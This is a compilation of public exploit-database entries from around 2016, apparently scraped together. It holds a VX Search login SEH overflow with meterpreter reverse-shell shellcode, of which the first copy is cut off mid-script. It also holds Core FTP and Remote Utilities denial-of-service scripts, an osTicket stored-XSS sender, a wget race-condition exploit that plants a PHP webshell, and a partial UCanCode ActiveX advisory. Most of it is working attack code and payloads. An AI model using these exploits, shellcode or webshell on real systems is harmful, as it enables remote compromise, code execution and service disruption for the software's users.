buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"


#pop pop ret 1001A1B8

nseh = "\x90\x90\xEB\x0B"
seh = "\xB8\xA1\x01\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672


print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
HireHackking 
#!/usr/bin/python

print "VX Search Enterprise 9.1.12 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1

#Vendor has been notified on multiple occasions
#Exploit for version 9.0.26: www.exploit-db.com/exploits/40455/

#Shout-out to carbonated and ozzie_offsec

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))


#bad chars \x00\x0a\x0d\x26


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

#payload size 308



buf =  ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"


#pop pop ret 10015BBE

nseh = "\x90\x90\xEB\x0B"
seh = "\xBE\x5B\x01\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672


print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
HireHackking 
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source: http://hyp3rlinx.altervista.org/advisories/CORE-FTP-REMOTE-SSH-SFTP-BUFFER-OVERFLOW.txt

[+] ISR: ApparitionSec



Vendor:
===============
www.coreftp.com



Product:
========================
Core FTP LE (client)
v2.2 build 1883

Core FTP LE - free Windows software that includes the client FTP features
you need. Features like SFTP (SSH), SSL, TLS, FTPS, IDN,
browser integration, site to site transfers, FTP transfer resume, drag and
drop support, file viewing & editing, firewall support,
custom commands, FTP URL parsing, command line transfers, filters, and
much, much more.



Vulnerability Type:
================================
Remote SSH/SFTP Buffer Overflow



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

Core FTP client is vulnerable to remote buffer overflow denial of service
when connecting to a malicious server using
SSH/SFTP protocol.

Upon receiving an overly long string of junk from the malicious FTP server
response, Core FTP crashes and the stack
is corrupted with several registers EBX, EDX, EDI being overwritten as can
be seen below.

WinDbg dump...

(d9c.16d8): Access violation - code c0000005 (first/second chance not
available)
eax=035b0000 ebx=00004141 ecx=03ac7e40 edx=41414141 esi=03ac7e38
edi=41414141
eip=77313ac3 esp=0439fa10 ebp=0439fae0 iopl=0         nv up ei pl nz ac pe
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00010216
ntdll!RtlImageNtHeader+0x92f:
77313ac3 8b12            mov     edx,dword ptr [edx]
 ds:002b:41414141=????????




Exploit code(s):
===============

import socket

print 'hyp3rlinx - Apparition Security'
print 'Core FTP SSH/SFTP Remote Buffer Overflow / DOS\r\n'
host='127.0.0.1'

port = 22
s = socket.socket()

payload="A"*77500
s.bind((host, port))
s.listen(5)

print 'Listening on port... %i' %port
print 'Connect to me!'

while True:
    conn, addr = s.accept()
    conn.send(payload+'\r\n')
    conn.close()



Exploitation Technique:
=======================
Remote



Severity Level:
===============
High




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx
HireHackking 
# Exploit Title: Osticket 1.9.14 and below (X-Forwarded-For) Stored XSS.
# Date: 24-11-2016
# Exploit Author: Joaquin Ramirez Martinez [ i0-SEC ]
# Software Link: http://osticket.com/
# Vendor: Osticket

"""
==============
 DESCRIPTION
==============

**osTicket** is a widely-used open source support ticket system. It seamlessly
integrates inquiries created via email, phone and web-based forms into a
simple easy-to-use multi-user web interface. Manage, organize and archive
all your support requests and responses in one place while providing your
customers with accountability and responsiveness they deserve.

(copy of Osticket - README.md)

=======================
 VULNERABILITY DETAILS
=======================

file `osticket/upload/bootstrap.php` contains this 
snippet of code (line 337-340):

  ...

if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
    // Take the left-most item for X-Forwarded-For
    $_SERVER['REMOTE_ADDR'] = trim(array_pop(
        explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])));

   ....

The $_SERVER['REMOTE_ADDR'] value gets overrided with the `X-Forwarded-For` header value,
at this point, it is not a vulnerability but...
file `osticket/upload/include/class.osticket.php` line 309-315 :

  ...

//Save log based on system log level settings.
        $sql='INSERT INTO '.SYSLOG_TABLE.' SET created=NOW(), updated=NOW() '
            .',title='.db_input(Format::sanitize($title, true))
            .',log_type='.db_input($loglevel[$level])
            .',log='.db_input(Format::sanitize($message, false))
            .',ip_address='.db_input($_SERVER['REMOTE_ADDR']);

        db_query($sql, false);

    ....


Everytime when a csrf attack is dettected (checking `X_CSRFTOKEN` header or the post parameter `__CSRFToken__`), 
Osticket saves into database the user controled value $_SERVER['REMOTE_ADDR'] even if it has an invalid format.

Finally the XSS is triggered when a user who can see the system logs like an administrator, visits
the /scp/logs.php URI. It happens because osticket does not encode the output of the data stored into the database.

The code responsible for lanching the XSS is located in `osticket/upload/include/staff/syslogs.inc-php`
line 142...

...
<td><?php echo $row['ip_address']; ?></td>
...

So...

An attacker can make an HTTP request with a header `X-Forwarded-For` containing the XSS payload 
with an invalid CSRF token to the login interface waiting for an administrator to view the logs and trigger the XSS.


================
  DEMONSTRATION
================

Demo video: https://www.youtube.com/watch?v=lx_WlL89F70

The demo also show a low severity XSS vulnerability in the helpdesk name/title of osticket.


================
  REFERENCES
================

https://github.com/osTicket/osTicket/releases
https://github.com/osTicket/osTicket/releases/tag/v1.9.15

X-Forwarded-For XSS:

https://github.com/osTicket/osTicket/pull/3439
https://github.com/osTicket/osTicket/commit/4396f91cdc990b7da598a7562eb634b89314b631

heldeskt name/tile XSS:

https://github.com/osTicket/osTicket/pull/3439
https://github.com/osTicket/osTicket/commit/2fb47bd84d1905b49beab05fcf3f01b00a171c37

================
  MITIGATIONS
================

update to version 1.9.15 or later

================
  CREDITS
================

Vulnerability discovered by Joaquin Ramirez Martinez
  
  https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q/videos
  https://twitter.com/rammarj

================
  TIMELINE
================

13-07-2016 - Vulnerability found
19-09-2016 - Osticket knew the flaws
01-11-2016 - Osticket patches vulnerabilities (v1.9.15 released)
24-11-2016 - Public disclosure.


"""
import urllib
import urllib2
from optparse import OptionParser

options = OptionParser(usage='python %prog [options]', description='Stored XSS')
options.add_option('-t', '--target', type='string', default='http://localhost', help='(required) example: http://localhost')
options.add_option('-p', '--path', type='string', default='/', help='osticket path. Default: /')
options.add_option('-x', '--payload', type='string', default='<svg/onload=alert(/Osticket_XSSed_by_i0-sec/)>'
  , help='xss payload. Default: "<svg/onload=alert(/Osticket_XSSed_by_i0-sec/)>"')

banner = """ 

======================================================   
                       OSTICKET 
  "The most popular ticketing system in the world"
                      Stored XSS

            by i0-sec (Joaquin R. M.)
======================================================

"""

def main():
    opts,args = options.parse_args()    
    print(banner)
    server = opts.target
    path = opts.path
    body = urllib.urlencode({"__CSRFToken__":"invalid", "do":"scplogin", "userid":"invalid", "passwd":"invalid", "submit":""})    
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36",
    "Content-type": "application/x-www-form-urlencoded", "X-Forwarded-For": opts.payload}
    url = server+path+"/scp/login.php" #default login interface URI for OSTICKET
    print('[+] Connecting to '+server+path)
    req = urllib2.Request(url, body, headers)
    try:
      print('[+] Sending payload... ')
      response = urllib2.urlopen(req)
      html = response.read()
    except Exception, e:
      pass
    print '[+] Payload sent.'
    print '[+] Completed.\n'

if __name__ == '__main__':
    main()
HireHackking 
# Exploit Title: Remote Utilities - Host 6.3 - Denial of Service
# Date: 2016-11-25
# Exploit Author: Peter Baris
# Vendor Homepage: www.remoteutilities.com 
# Software Link: http://saptech-erp.com.au/resources/executables/host6.3.zip
# Version: 6.3.0.6 - (other version are also affected below version 6.5 beta 3)
# Tested on: Windows 7 SP1 x64 and Windows Server 2008 R2 
# After the notification, the company released a fix in version 6.5 beta 3
# On Windows 7 - the software refuses connections after execution. 
# On Windows 2008 R2 it caused 100% CPU usage and occasional server crash when 1 core was assigned


#!/usr/bin/python
import socket
counter=0

while (counter <= 5000):	
	counter=counter+1
	print(counter)
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect=s.connect(('<host address>',5650))
	s.close()
HireHackking 
'''
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html

- CVE-2016-7098
- Release date: 24.11.2016
- Revision 1.0
- Severity: Medium
=============================================


I. VULNERABILITY
-------------------------

GNU Wget < 1.18       Access List Bypass / Race Condition


II. BACKGROUND
-------------------------

"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and 
FTP, the most widely-used Internet protocols. 
It is a non-interactive commandline tool, so it may easily be called from 
scripts, cron jobs, terminals without X-Windows support, etc.

GNU Wget has many features to make retrieving large files or mirroring entire 
web or FTP sites easy
"

https://www.gnu.org/software/wget/


III. INTRODUCTION
-------------------------

GNU wget in version 1.17 and earlier, when used in mirroring/recursive mode, 
is affected by a Race Condition vulnerability that might allow remote attackers 
to bypass intended wget access list restrictions specified with -A parameter.
This might allow attackers to place malicious/restricted files onto the system. 
Depending on the application / download directory, this could potentially lead 
to other vulnerabilities such as code execution etc.


IV. DESCRIPTION
-------------------------

When wget is used in recursive/mirroring mode, according to the manual it can 
take the following access list options:

"Recursive Accept/Reject Options:
  -A acclist --accept acclist
  -R rejlist --reject rejlist

Specify comma-separated lists of file name suffixes or patterns to accept or 
reject. Note that if any of the wildcard characters, *, ?, [ or ], appear in 
an element of acclist or rejlist, it will be treated as a pattern, rather 
than a suffix."


These can for example be used to only download JPG images. 

It was however discovered that when a single file is requested with recursive 
option (-r / -m) and an access list ( -A ), wget only applies the checks at the
end of the download process. 

This can be observed in the output below:

# wget -r -nH -A '*.jpg' http://attackersvr/test.php
Resolving attackersvr... 192.168.57.1
Connecting to attackersvr|192.168.57.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: ‘test.phpâ€

15:05:46 (27.3 B/s) - ‘test.php†saved [52]

Removing test.php since it should be rejected.

FINISHED


Although wget deletes the file at the end of the download process, this creates 
a race condition as an attacker with control over the URL/remote server could 
intentionally slow down the download process so that they had a chance to make 
use of the malicious file before it gets deleted.

It is very easy to win the race as the file only gets deleted after the HTTP 
connection is terminated. The attacker could therefore keep the connection open 
as long as it was necessary to make use of the uploaded file as demonstrated
in the proof of concept below.


V. PROOF OF CONCEPT EXPLOIT
------------------------------


Here is a simple vulnerable PHP web application that uses wget to download 
images from a user-provided server/URL:


---[ image_importer.php ]---

<?php
        // Vulnerable webapp [image_importer.php]
        // Uses wget to import user images from provided site URL 
        // It only accepts JPG files (-A wget option).

        if ( isset($_GET['imgurl']) ) {
                $URL = escapeshellarg($_GET['imgurl']);
        } else {
                die("imgurl parameter missing");
        }

        if ( !file_exists("image_uploads") ) {
                mkdir("image_uploads");
        }

        // Download user JPG images into /image_uploads directory
        system("wget -r -nH -P image_uploads -A '*.jpg' $URL 2>&1");
?>


----------------------------


For example:
https://victimsvr/image_importer.php?imgurl= href="http://images/logo.jpg">http://images/logo.jpg

will cause wget to upload logo.jpg file into:
https://victimsvr/images_uploads/logo.jpg

The wget access list (-A) is to ensure that only .jpg files get uploaded.

However due to the wget race condition vulnerability an attacker could use 
the exploit below to upload an arbitrary PHP script to /image_uploads directory
and achieve code execution.


---[ wget-race-exploit.py ]---
'''

#!/usr/bin/env python

#
# Wget < 1.18  Access List Bypass / Race Condition PoC Exploit
# CVE-2016-7098
#
# Dawid Golunski
# https://legalhackers.com
#
#
# This PoC wget exploit can be used to bypass wget -A access list and upload a malicious
# file for long enough to take advantage of it.
# The exploit sets up a web server on port 80 and waits for a download request from wget.
# It then supplies a PHP webshell payload and requests the uploaded file before it gets
# removed by wget. 
#
# Adjust target URL (WEBSHELL_URL) before executing.
# 
# Full advisory at:
#
# https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
#
# Disclaimer:
#
# For testing purposes only. Do no harm.
#
# 

import SimpleHTTPServer
import time
import SocketServer
import urllib2
import sys

HTTP_LISTEN_IP = '0.0.0.0'
HTTP_LISTEN_PORT = 80

PAYLOAD='''
<?php
	//our webshell
	system($_GET["cmd"]);
	system("touch /tmp/wgethack");
?>
'''

# Webshell URL to be requested before the connection is closed 
# i.e before the uploaded "temporary" file gets removed.
WEBSHELL_URL="http://victimsvr/image_uploads/webshell.php"

# Command to be executed through 'cmd' GET paramter of the webshell
CMD="/usr/bin/id"


class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
   def do_GET(self):
       # Send the payload on GET request
       print "[+] Got connection from wget requesting " + self.path + " via GET :)\n"
       self.send_response(200)
       self.send_header('Content-type', 'text/plain')
       self.end_headers()
       self.wfile.write(PAYLOAD)
       print "\n[+] PHP webshell payload was sent.\n"

       # Wait for the file to be flushed to disk on remote host etc.
       print "[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\n"
       time.sleep(2)

       # Request uploaded webshell
       print "[+} File '" + self.path + "' should be saved by now :)\n"
       print "[+} Executing " + CMD + " via webshell URL: " + WEBSHELL_URL + "?cmd=" + CMD + "\n"
       print "[+} Command result: "
       print urllib2.urlopen(WEBSHELL_URL+"?cmd="+CMD).read()

       print "[+} All done. Closing HTTP connection...\n"
       # Connection will be closed on request handler return
       return

handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)

print "\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \nCVE-2016-7098\n\nDawid Golunski \nhttps://legalhackers.com \n"
print "[+} Exploit Web server started on HTTP port %s. Waiting for wget to connect...\n" % HTTP_LISTEN_PORT

handler.serve_forever()

'''
------------------------------

If the attacker run this exploit on their server ('attackersver') and pointed 
the vulnerable script image_importer.php at it via URL:

https://victimsvr/image_importer.php?imgurl= href="http://attackersvr/webshell.php">http://attackersvr/webshell.php

The attacker will see output similar to:



root@attackersvr:~# ./wget-race-exploit.py 

Wget < 1.18 Access List Bypass / Race Condition PoC Exploit 
CVE-2016-7098

Dawid Golunski 
https://legalhackers.com 

[+} Exploit Web server started on HTTP port 80. Waiting for wget to connect...

[+] Got connection from wget requesting /webshell.php via GET :)

victimsvr - - [24/Nov/2016 00:46:18] "GET /webshell.php HTTP/1.1" 200 -

[+] PHP webshell payload was sent.

[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...

[+} File '/webshell.php' should be saved by now :)

[+} Executing /usr/bin/id via webshell URL: http://victimsvr/image_uploads/webshell.php?cmd=/usr/bin/id

[+} Command result: 

uid=33(www-data) gid=33(www-data) groups=33(www-data),1002(nagcmd)

[+} All done. Closing HTTP connection...



VI. BUSINESS IMPACT
-------------------------

The vulnerability might allow remote servers to bypass intended wget access list 
restrictions to temporarily store a malicious file on the server. 
In certain cases, depending on the context wget command was used in and download
path, this issue could potentially lead to other vulnerabilities such as
script execution as shown in the PoC section.
 
VII. SYSTEMS AFFECTED
-------------------------

Wget < 1.18
 
VIII. SOLUTION
-------------------------

Update to latest version of wget 1.18 or apply patches provided by the vendor.
 
IX. REFERENCES
-------------------------

https://legalhackers.com

https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html

https://legalhackers.com/exploits/CVE-2016-7098/wget-race-exploit.py

https://www.gnu.org/software/wget/

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7098

https://security-tracker.debian.org/tracker/CVE-2016-7098

http://lists.opensuse.org/opensuse-updates/2016-09/msg00044.html

http://lists.gnu.org/archive/html/bug-wget/2016-08/msg00124.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7098


X. CREDITS
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com

https://legalhackers.com
 
XI. REVISION HISTORY
-------------------------

24.11.2016 - Advisory released
 
XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
'''
HireHackking 
UCanCode multiple vulnerabilities

Url: http://www.hmi-software.com/
     http://www.ucancode.net/index.htm
     http://www.ucancode.net/bbs/zhuce/login.htm

Description: Form vendor's web page "UCanCode Software is a Market Leading provider of HMI & SCADA, CAD, UML, GIS, Vector Graphics
             and Real Time Data Visualization Graphics Source Code Kits for C/C++ and .NET software developers more than 40 countries
             around the world!"
             Great... 40 countries. It's time to take a look to their software!
             Package name "UCanCode_Controls.zip"
             After the installation, we can found these activex controls:
			 
             ---------------------------------------------
             ProgID: UCCVIEWER.UCCViewerCtrl.1
             CLSID: {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
             ---------------------------------------------
             ProgID: UCCDRAW.UCCDrawCtrl.1
             CLSID: {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
             ---------------------------------------------
             progID: TKDRAWCAD.TKDrawCADCtrl.1
             CLSID: {9022B790-B810-45B4-80BC-2D94EEC5343C}
             ---------------------------------------------
             ProgID: UCCPRINT.UCCPrintCtrl.1
             CLSID: {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
             ---------------------------------------------
             ProgID: UCCDIAGRAM.UCCDiagramCtrl.1
             CLSID: {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
             ---------------------------------------------
             ProgID: UCCUML.UCCUMLCtrl.1
             CLSID: {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
             ---------------------------------------------
             ProgID: UCCHMI.UCCHMICtrl.1
             CLSID: {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
             ---------------------------------------------
             ProgID: UCCSIMPLE.UCCSIMPLECtrl.1
             CLSID: {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
             ---------------------------------------------
             and all are marked as: RegKey Safe for Script: True
                                    RegKey Safe for Init: True
                                    Implements IObjectSafety: False

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
---------------------------------------------------------------------
INSECURE METHODS:
In these coontrols there are a lot of insecure methods which can be used to overwrite
arbitrary files in user's pc. This is the complete list:

1) various Export* methods

Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE  {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE  {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI  {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI  {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML  {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML  {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML  {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Function ExportBitmapData (ByRef phBlob  As Long, ByVal imageShape  As Long) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram  {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram  {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint  {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint  {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD  {9022B790-B810-45B4-80BC-2D94EEC5343C}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD  {9022B790-B810-45B4-80BC-2D94EEC5343C}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function ExportToBitmapFile (ByVal lpszFile As String) As Boolean
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer  {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer  {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------

2) various Save* methods:

----------------------------------------
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE  {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI  {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML  {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
